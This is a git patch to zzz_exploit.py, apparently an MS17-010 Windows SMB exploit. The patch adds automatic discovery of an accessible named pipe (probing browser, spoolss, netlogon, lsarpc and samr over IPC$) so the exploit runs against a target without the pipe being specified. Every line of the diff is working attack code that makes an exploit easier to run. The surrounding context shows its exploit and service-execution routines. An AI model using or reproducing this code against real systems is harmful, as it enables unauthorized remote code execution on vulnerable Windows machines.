From 6f47613603d67a28598b866f618c01bbb791dfbb Mon Sep 17 00:00:00 2001 From: worawit Date: Sun, 16 Jul 2017 22:50:44 +0700 Subject: [PATCH] find named pipe if it is omitted --- zzz_exploit.py | 29 ++++++++++++++++++++++++++--- 1 file changed, 26 insertions(+), 3 deletions(-) diff --git a/zzz_exploit.py b/zzz_exploit.py index 2dcfb52..37e9bab 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -269,6 +269,22 @@ def wait_for_request_processed(conn): # send echo is faster than sleep(0.05) when connection is very good conn.send_echo('a') +def find_named_pipe(conn): + pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ] + + tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$') + found_pipe = None + for pipe in pipes: + try: + fid = conn.nt_create_andx(tid, pipe) + conn.close(tid, fid) + found_pipe = pipe + except smb.SessionError, e: + pass + + conn.disconnect_tree(tid) + return found_pipe + special_mid = 0 extra_last_mid = 0 @@ -768,6 +784,13 @@ def exploit(target, pipe_name): else: print('This exploit does not support this target') sys.exit() + + if pipe_name is None: + pipe_name = find_named_pipe(conn) + if pipe_name is None: + print('Not found accessible named pipe') + return False + print('Using named pipe: '+pipe_name) if not info['method'](conn, pipe_name, info): return False @@ -921,12 +944,12 @@ def service_exec(conn, cmd): rpcsvc.disconnect() -if len(sys.argv) != 3: - print("{} ".format(sys.argv[0])) +if len(sys.argv) < 2: + print("{} [pipe_name]".format(sys.argv[0])) sys.exit(1) target = sys.argv[1] -pipe_name = sys.argv[2] +pipe_name = None if len(sys.argv) < 3 else sys.argv[2] exploit(target, pipe_name) print('Done')